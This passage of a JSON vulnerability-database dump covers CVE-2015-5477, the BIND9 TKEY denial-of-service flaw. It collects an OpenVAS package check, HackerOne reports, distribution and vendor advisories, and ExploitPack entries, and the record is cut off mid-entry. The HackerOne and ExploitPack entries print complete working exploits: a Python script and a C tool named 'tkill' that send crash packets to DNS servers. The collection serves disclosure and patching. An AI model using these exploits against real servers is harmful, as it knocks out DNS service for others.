use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1513\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-July/021268.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs-lite\", rpm:\"bind-libs-lite~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-license\", rpm:\"bind-license~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-lite-devel\", rpm:\"bind-lite-devel~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb-chroot\", rpm:\"bind-sdb-chroot~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4~18.el7_1.3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "hackerone": [{"lastseen": "2018-12-17T15:36:38", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "Hello Team NextCloud,\n\nIn reference report #217381\nI've reported the DDOS attack via DNS Port at OwnCloud..\nAnd it was successfully patched.\n\nBut now same issue I got at\n\n```\nci.nextcloud.com\n```\nProof Of Concept:\nHere it is the nmap result of ci.nextcloud.com\n\nNMap Scan Results:\n```\nStarting Nmap 7.40 ( https://nmap.org ) at 2017-06-08 04:12 PKT\nNmap scan report for ci.nextcloud.com (\u2588\u2588\u2588\u2588\u2588)\nHost is up (0.077s latency).\nrDNS record for \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\nNot shown: 96 filtered ports\nPORT STATE SERVICE VERSION\n22/tcp open tcpwrapped\n53/tcp open tcpwrapped\n80/tcp open tcpwrapped\n443/tcp open tcpwrapped\n```\nNow here it is the telnet result:\n```\n\u2500\u2500\u257c $telnet\ntelnet> open\n(to) ci.nextcloud.com 53\nTrying \u2588\u2588\u2588...\nConnected to ci.nextcloud.com.\nEscape character is '^]'.\n```\n\nSo this can leads to a serious DDOS attack at doc.owncloud.com using the exploit..\n\nExploit Link:\n\n```\nhttps://github.com/elceef/tkeypoc/\n```\nVulnerability Reference CVE Details:\n\n```\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477\n```\nExploit PoC:\n\nExploit Title: PoC for BIND9 TKEY DoS\n\nExploit Author: elceef\n\nSoftware Link: https://github.com/elceef/tkeypoc/\n\nVersion: ISC BIND 9\n\nTested on: multiple\n\nCVE : CVE-2015-5477\n\n```\n!/usr/bin/env python\n\nimport socket\nimport sys\n\nprint('CVE-2015-5477 BIND9 TKEY PoC')\n\nif len(sys.argv) < 2:\nprint('Usage: ' + sys.argv[0] + ' [target]')\nsys.exit(1)\n\nprint('Sending packet to ' + sys.argv[1] + ' ...')\n\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(payload, (sys.argv[1], 53))\n\nprint('Done.')\n```\n\nThanks :)\n", "modified": "2017-06-08T17:51:14", "published": "2017-06-07T23:28:05", "id": "H1:237860", "href": "https://hackerone.com/reports/237860", "type": "hackerone", "title": "Nextcloud: ci.nextcloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-17T15:36:40", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "BIND9 TKEY Vulnerability + Exploit (Denial of Service)", "modified": "2017-06-01T12:18:55", "published": "2017-03-31T03:48:28", "id": "H1:217381", "href": "https://hackerone.com/reports/217381", "type": "hackerone", "title": "ownCloud: doc.owncloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)", "cvss": {"score": 0.0, "vector": "NONE"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:40", "bulletinFamily": "unix", "description": "A flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet leading to denial of service.", "modified": "2015-07-29T00:00:00", "published": "2015-07-29T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-July/000376.html", "id": "ASA-201507-22", "title": "bind: denial of service", "type": "archlinux", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:20", "bulletinFamily": "exploit", "description": "\nISC BIND 9 - TKEY Remote Denial of Service (PoC)", "modified": "2015-08-05T00:00:00", "published": "2015-08-05T00:00:00", "id": "EXPLOITPACK:46DEBFAC850194C04C54F93E0DFF5F4F", "href": "", "title": "ISC BIND 9 - TKEY Remote Denial of Service (PoC)", "type": "exploitpack", "sourceData": "#!/usr/bin/env python\n\n# Exploit Title: PoC for BIND9 TKEY DoS\n# Exploit Author: elceef\n# Software Link: https://github.com/elceef/tkeypoc/\n# Version: ISC BIND 9\n# Tested on: multiple\n# CVE : CVE-2015-5477\n\n\nimport socket\nimport sys\n\nprint('CVE-2015-5477 BIND9 TKEY PoC')\n\nif len(sys.argv) < 2:\n\tprint('Usage: ' + sys.argv[0] + ' [target]')\n\tsys.exit(1)\n\nprint('Sending packet to ' + sys.argv[1] + ' ...')\n\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(payload, (sys.argv[1], 53))\n\nprint('Done.')", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-04-01T19:04:20", "bulletinFamily": "exploit", "description": "\nISC BIND 9 - TKEY (PoC)", "modified": "2015-08-01T00:00:00", "published": "2015-08-01T00:00:00", "id": "EXPLOITPACK:BE4F638B632EA0754155A27ECC4B3D3F", "href": "", "title": "ISC BIND 9 - TKEY (PoC)", "type": "exploitpack", "sourceData": "/*\n PoC for BIND9 TKEY assert Dos (CVE-2015-5477)\n\n Usage:\n tkill <hostname>\n\n What it does:\n - First sends a \"version\" query to see if the server is up.\n - Regardless of the version response, it then sends the DoS packet.\n - Then it waits 5 seconds for a response. If the server crashes,\n there will be no response.\n\n Notes:\n - multiple hostnames can be specified on the command-line\n - IP addresses can be specified instead of hostnames\n - supports IPv4 and IPv6\n - runs on Linux, Mac, and Windows (cygwin or VisualStudio)\n - if a hostname resolves to more than one IP, then all IPs\n will be probed\n\n About the vuln:\n For control information, the \"TSIG\" feature allows packets to be\n signed with a password. This allows slave servers to get updates\n from master servers without a MitM attack (like from the NSA)\n changing the data on the network.\n\n A password can be distributed out of band, such as SSHing into\n a box and editing the configuration file. Anther way is through\n public-keys. That's the \"TKEY\" feature: it distributes new\n TSIG passwords using public-keys.\n\n When processing a TKEY packet, the code will call a function to\n fetch the proper TKEY record. It looks in two places: the\n \"answer records\" section, and the \"additional records\" section.\n If it can't find it in the \"additional\", it looks in \"answer\".\n\n The lookup function takes a parameter that is initially set\n to NULL. During the failed lookup in the \"additional\" section,\n it may set that parameter to a non-null value. Since a non-null\n value is passed in again during the second lookup in the \"answer\"\n section, the code crashes.\n\n The patch was to set the variable to NULL before the second lookup.\n\n The correct fix would simply not check to see if the parameter\n was NULL to be begin with. It's an out-only parameter, so it's value\n on input doesn't matter.\n\n This is a just a \"brainfart\" bug that can only result in a crash\n of the server. It cann't result in data-corruption or code\n execution.\n\n About this code:\n To learn about writing network code, this is probably something useful\n to study.\n\n It works on both Windows and Unix (Linux, Mac, etc.). You can see where\n the differences are between the two platforms, as well as the simularities.\n\n It works on both IPv4 and IPv6. However, if you search through the code,\n you'll find nothing that specifically references either version. It's\n magically dual-stack. That's because it uses new functions like\n \"getaddrinfo()\" instead of old functions like \"gethostbyname()\".\n \n*/\n#include <stdio.h>\n#include <string.h>\n#include <ctype.h>\n\n#ifdef WIN32\n#include <winsock2.h>\n#include <ws2tcpip.h>\n#pragma comment(lib, \"Ws2_32.lib\")\n#define WSA(err) (WSA##err)\n#define WSAEAGAIN WSAETIMEDOUT\n#else\n#include <unistd.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <netdb.h>\n#include <arpa/inet.h>\n#include <errno.h>\n#define WSAGetLastError() (errno)\n#define WSA(err) (err)\n#define closesocket(fd) close(fd)\n#endif\n\n/*\n * DoS packet that will crash server\n */\nstatic const unsigned char dospacket[] = {\n 0x01, 0x02, /* xid */\n 0x01, 0x00, /* query */\n 0x00, 0x01, /* one question */\n 0x00, 0x00, /* no answer */\n 0x00, 0x00, /* no authorities */\n 0x00, 0x01, /* one additional: must be 'additional' section to work*/\n\n /* Query name */\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00,\n 0x00, 249, /* TKEY record type */\n 0x00, 255,\n\n /* Additional record */\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */\n 0x00, 16, /* record type: must NOT be 249/TKEY */\n 0x00, 255,\n 0, 0, 0, 0,\n 0, 51,\n 50,\n 'h', 't', 't', 'p', 's', ':', '/', '/', \n 'g', 'i', 't', 'h', 'u', 'b', '.', 'c', \n 'o', 'm', '/', 'r', 'o', 'b', 'e', 'r', \n 't', 'd', 'a', 'v', 'i', 'd', 'g', 'r', \n 'a', 'h', 'a', 'm', '/', 'c', 'v', 'e', \n '-', '2', '0', '1', '5', '-', '5', '4', \n '7', '7'\n};\n\n\n/*\n * Packet for querying the version of the server, to test if it's up\n */\nstatic const unsigned char versionpacket[] = {\n 0x03, 0x04, /* xid */\n 0x01, 0x00, /* query */\n 0x00, 0x01, /* one question */\n 0x00, 0x00, /* no answer */\n 0x00, 0x00, /* no authorities */\n 0x00, 0x00, /* no additional */\n\n /* Query name */\n 0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00,\n 0x00, 16, /* TXT */\n 0x00, 3, /* CHOAS */\n};\n\n\n/*\n * YOLO BIND version.bind query\n */\nint query_version(int fd, const struct addrinfo *target)\n{\n int bytes_received;\n int i;\n struct sockaddr_storage from;\n socklen_t sizeof_from = sizeof(from);\n char hostname[256];\n unsigned char buf[2048];\n int result = 0;\n\n /* \n * Query version \n */\n sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0, \n target->ai_addr, target->ai_addrlen);\n\n\n /* \n * get response \n */\nagain:\n bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\n if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\n fprintf(stderr, \"[-] timed out getting version, trying again\\n\");\n return 0;\n } else if (bytes_received <= 0) {\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\n return 0;\n }\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\n\n /* \n * parse response \n */\n if (bytes_received < 12)\n goto again;\n if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1])\n goto again;\n if ((buf[2]&0x80) != 0x80)\n goto again;\n\n /*\n * Handle respoonse code \n */\n switch (buf[3]&0x0F) {\n case 0:\n /* parse packet below */\n break;\n case 1:\n fprintf(stderr, \"[-] %s: FORMERR\\n\", hostname);\n return 1;\n case 2:\n fprintf(stderr, \"[-] %s: SRVFAIL\\n\", hostname);\n return 1;\n case 3:\n fprintf(stderr, \"[-] %s: NAMERR\\n\", hostname);\n return 1;\n case 4:\n fprintf(stderr, \"[-] %s: NOTIMPL\\n\", hostname);\n return 1;\n case 5:\n fprintf(stderr, \"[-] %s: REFUSED\\n\", hostname);\n return 1;\n default:\n fprintf(stderr, \"[-] %s: unknown error: %u\\n\", hostname, buf[3]);\n return 1;\n }\n\n\n i = 12; /* skip header */\n\n /* \n * skip query name \n */\n while (i < bytes_received) {\n if (buf[i] == 0) {\n i++;\n break;\n } else if ((buf[i] & 0xC0) == 0xC0) {\n i += 2;\n break;\n } else {\n i += buf[i] + 1;\n }\n }\n i += 4;\n\n /* \n * process all answers \n */\n while (i + 12 <= bytes_received) {\n int t, c, len;\n\n /* skip answer name */\n while (i < bytes_received) {\n if (buf[i] == 0) {\n i++;\n break;\n } else if ((buf[i] & 0xC0) == 0xC0) {\n i += 2;\n break;\n } else {\n i += buf[i] + 1;\n }\n }\n\n /* extract resource-recorder header */\n if (i + 10 > bytes_received)\n break;\n t = buf[i+0]<<8 | buf[i+1];\n c = buf[i+2]<<8 | buf[i+3];\n len = buf[i+8]<<8 | buf[i+9];\n i += 10;\n\n /* verify TXT CHAOS */\n if (t != 16 || c != 3) {\n i += len;\n continue;\n }\n\n /* fix len */\n if (len > bytes_received - i)\n len = bytes_received - i;\n\n /* print the hostname */\n fprintf(stderr, \"[+] %s: \", hostname);\n\n /* print the strings */\n {\n int j = i;\n\n i += len;\n\n while (j < i) {\n int len2 = buf[j];\n int k;\n j++;\n if (len2 > bytes_received - len2)\n len2 = bytes_received - len2;\n fprintf(stderr, \"\\\"\");\n\n for (k=j; k<j+len2; k++) {\n if (buf[k] == '\\\\')\n fprintf(stderr, \"\\\\\");\n else if (!isprint(buf[k]))\n fprintf(stderr, \"\\\\x%02x\", buf[k]);\n else\n fprintf(stderr, \"%c\", buf[k]);\n }\n\n j = k;\n\n fprintf(stderr, \"\\\" \");\n }\n fprintf(stderr, \"\\n\");\n }\n result = 1;\n }\n return result;\n}\n\n/*\n * Send the DoS packet\n */\nvoid probe(const struct addrinfo *target)\n{\n int fd;\n int x;\n int i;\n char hostname[256];\n char buf[2048];\n struct sockaddr_storage from;\n socklen_t sizeof_from = sizeof(from);\n \n \n /*\n * Print status\n */\n getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\n fprintf(stderr, \"[+] %s: Probing...\\n\", hostname);\n\n /*\n * Create a socket\n */\n fd = socket(target->ai_family, SOCK_DGRAM, 0);\n if (fd <= 0) {\n fprintf(stderr, \"[-] failed: socket(): %u\\n\", WSAGetLastError());\n return;\n }\n\n /*\n * Set the timeout to 5-seconds\n */\n {\n#ifdef WIN32\n int milliseconds = 5000;\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds));\n#else\n struct timeval t;\n t.tv_sec = 5;\n t.tv_usec = 0;\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t));\n#endif\n\n if (x != 0) {\n fprintf(stderr, \"[-] err setting recv timeout: %u\\n\", WSAGetLastError());\n }\n }\n\n\n /*\n * First, query the server to grab its version, but also to see it's up\n */\n fprintf(stderr, \"[+] Querying version...\\n\");\n for (i=0; i<3; i++) {\n if (query_version(fd, target))\n break;\n if (i == 2) {\n fprintf(stderr, \"[-] Can't query server, is it crashed already?\\n\");\n fprintf(stderr, \"[-] Sending exploit anyway.\\n\");\n }\n }\n\n\n /*****************\n * SEND DoS PACKET\n *****************/\n fprintf(stderr, \"[+] Sending DoS packet...\\n\");\n sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen);\n\n /* Grab response */\n fprintf(stderr, \"[+] Waiting 5-sec for response...\\n\");\n for (;;) {\n x = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\n if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\n fprintf(stderr, \"[+] timed out, probably crashed\\n\");\n break;\n } else if (x <= 0) {\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\n break;;\n }\n\n if (x > 2 && (buf[0] != dospacket[0] || buf[1] != dospacket[1]))\n continue;\n \n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\n fprintf(stderr, \"[-] %s: got response, so probably not vulnerable\\n\", hostname);\n break;\n }\n\n\n closesocket(fd);\n}\n\n\n/*\n * The main function just parses the arguments and looks up IP addrsses\n * before calling the \"probe\" function to actually exploit the targets\n */\nint main(int argc, char *argv[])\n{\n int i;\n\n#ifdef WIN32\n {WSADATA x; WSAStartup(0x101, &x);}\n#endif\n\n fprintf(stderr, \"--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\\n\");\n\n if (argc <= 1) {\n fprintf(stderr, \"[-] no host specified\\n\");\n fprintf(stderr, \"usage:\\n tkill <hostname>\\n\");\n return -1;\n }\n\n\n /*\n * Query all targets specified on the command line\n */\n for (i=1; i<argc; i++) {\n const char *hostname = argv[i];\n struct addrinfo *info;\n struct addrinfo *target;\n char oldtarget[256] = \"\";\n int x;\n\n /*\n * Lookup the name of the target\n */\n fprintf(stderr, \"[+] %s: Resolving to IP address\\n\", hostname);\n x = getaddrinfo(hostname, \"53\", 0, &info);\n if (x != 0) {\n fprintf(stderr, \"[-] %s: failed: %s\\n\", hostname, gai_strerror(x));\n continue;\n }\n\n if (info->ai_next) {\n fprintf(stderr, \"[+] %s: Resolved to multiple IPs (NOTE)\\n\", hostname);\n }\n\n /*\n * Since a name can return multiple IP addresses,\n * send a probe to all the results\n */\n for (target=info; target; target = target->ai_next) {\n char newtarget[256];\n\n /* bah, stupid bug in Linux gets the same target multiple\n * times */\n getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST);\n if (strcmp(newtarget, oldtarget) == 0)\n continue;\n memcpy(oldtarget, newtarget, sizeof(oldtarget));\n\n probe(target);\n printf(\"\\n\");\n }\n\n /*\n * Cleanup\n */\n freeaddrinfo(info);\n }\n\n return 0;\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:40:57", "bulletinFamily": "unix", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "modified": "2015-07-28T21:08:56", "published": "2015-07-28T21:08:56", "id": "SUSE-SU-2015:1304-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00043.html", "type": "suse", "title": "Security update for bind (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:32", "bulletinFamily": "unix", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "modified": "2015-07-30T14:08:45", "published": "2015-07-30T14:08:45", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00045.html", "id": "SUSE-SU-2015:1316-1", "title": "Security update for bind (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:42:04", "bulletinFamily": "unix", "description": "bind was updated to fix one security issue:\n\n * CVE-2015-5477: Remote Denial-of-Service via TKEY queries.\n (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or configuration\n options limiting or denying service because the exploitable code occurs\n early in the packet handling.\n\n Security Issues:\n\n * CVE-2015-5477\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477</a>>\n\n\n", "modified": "2015-07-30T18:09:56", "published": "2015-07-30T18:09:56", "id": "SUSE-SU-2015:1322-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00048.html", "type": "suse", "title": "Security update for bind (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:18:32", "bulletinFamily": "unix", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "modified": "2015-07-28T21:09:26", "published": "2015-07-28T21:09:26", "id": "SUSE-SU-2015:1305-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00044.html", "type": "suse", "title": "Security update for bind (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:31:51", "bulletinFamily": "unix", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (boo#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "modified": "2015-08-03T12:08:36", "published": "2015-08-03T12:08:36", "id": "OPENSUSE-SU-2015:1335-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-08/msg00001.html", "type": "suse", "title": "Security update for bind (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:00", "bulletinFamily": "software", "description": "\r\n\r\nAPPLE-SA-2015-08-13-4 OS X Server v4.1.5\r\n\r\nOS X Server v4.1.5 is now available and addresses the following:\r\n\r\nBIND\r\nAvailable for: OS X Yosemite v10.10.5 or later\r\nImpact: A remote attacker may be able to cause a denial of service\r\nDescription: An assertion issue existed in the handling of TKEY\r\npackets. This issue was addressed by updating BIND to version\r\n9.9.7-P2.\r\nCVE-ID\r\nCVE-2015-5477\r\n\r\n\r\nOS X Server v4.1.5 may be obtained from the Mac App Store.\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n", "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32391", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32391", "title": "APPLE-SA-2015-08-13-4 OS X Server v4.1.5", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "bulletinFamily": "software", "description": "\r\n\r\n=============================================================================\r\nFreeBSD-SA-15:17.bind Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: BIND remote denial of service vulnerability\r\n\r\nCategory: contrib\r\nModule: bind\r\nAnnounced: 2015-07-28\r\nCredits: ISC\r\nAffects: FreeBSD 8.x and FreeBSD 9.x.\r\nCorrected: 2015-07-28 19:58:54 UTC (stable/9, 9.3-STABLE)\r\n 2015-07-28 19:59:22 UTC (releng/9.3, 9.3-RELEASE-p21)\r\n 2015-07-28 19:58:54 UTC (stable/8, 8.4-STABLE)\r\n 2015-07-28 19:59:22 UTC (releng/8.4, 8.4-RELEASE-p35)\r\nCVE Name: CVE-2015-5477\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:https://security.FreeBSD.org/>.\r\n\r\nI. Background\r\n\r\nBIND 9 is an implementation of the Domain Name System (DNS) protocols.\r\nThe named(8) daemon is an Internet Domain Name Server.\r\n\r\nII. Problem Description\r\n\r\nAn error in the handling of TKEY queries can be exploited by an attacker\r\nfor use as a denial-of-service vector, as a constructed packet can use\r\nthe defect to trigger a REQUIRE assertion failure, causing BIND to exit.\r\n\r\nIII. Impact\r\n\r\nA remote attacker can trigger a crash of a name server. Both recursive and\r\nauthoritative servers are affected, and the exposure can not be mitigated\r\nby either ACLs or configuration options limiting or denying service because\r\nthe exploitable code occurs early in the packet handling, before checks\r\nenforcing those boundaries.\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available, but systems that are not running BIND are not\r\nvulnerable.\r\n\r\nV. Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\r\nrelease / security branch (releng) dated after the correction date.\r\n\r\nThe named service has to be restarted after the update. A reboot is\r\nrecommended but not required.\r\n\r\n2) To update your vulnerable system via a binary patch:\r\n\r\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\r\nplatforms can be updated via the freebsd-update(8) utility:\r\n\r\n# freebsd-update fetch\r\n# freebsd-update install\r\n\r\nThe named service has to be restarted after the update. A reboot is\r\nrecommended but not required.\r\n\r\n3) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to the applicable\r\nFreeBSD release branches.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch https://security.FreeBSD.org/patches/SA-15:17/bind.patch\r\n# fetch https://security.FreeBSD.org/patches/SA-15:17/bind.patch.asc\r\n# gpg --verify bind.patch.asc\r\n\r\nb) Apply the patch. Execute the following commands as root:\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile the operating system using buildworld and installworld as\r\ndescribed in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.\r\n\r\nRestart the applicable daemons, or reboot the system.\r\n\r\nVI. Correction details\r\n\r\nThe following list contains the correction revision numbers for each\r\naffected branch.\r\n\r\nBranch/path Revision\r\n-------------------------------------------------------------------------\r\nstable/8/ r285977\r\nreleng/8.4/ r285980\r\nstable/9/ r285977\r\nreleng/9.3/ r285980\r\n-------------------------------------------------------------------------\r\n\r\nTo see which files were modified by a particular revision, run the\r\nfollowing command, replacing NNNNNN with the revision number, on a\r\nmachine with Subversion installed:\r\n\r\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\r\n\r\nOr visit the following URL, replacing NNNNNN with the revision number:\r\n\r\n<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>\r\n\r\nVII. References\r\n\r\n<URL:https://kb.isc.org/article/AA-01272>\r\n\r\n<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477>\r\n\r\nThe latest revision of this advisory is available at\r\n<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:17.bind.asc>\r\n\r\n", "modified": "2015-08-03T00:00:00", "published": "2015-08-03T00:00:00", "id": 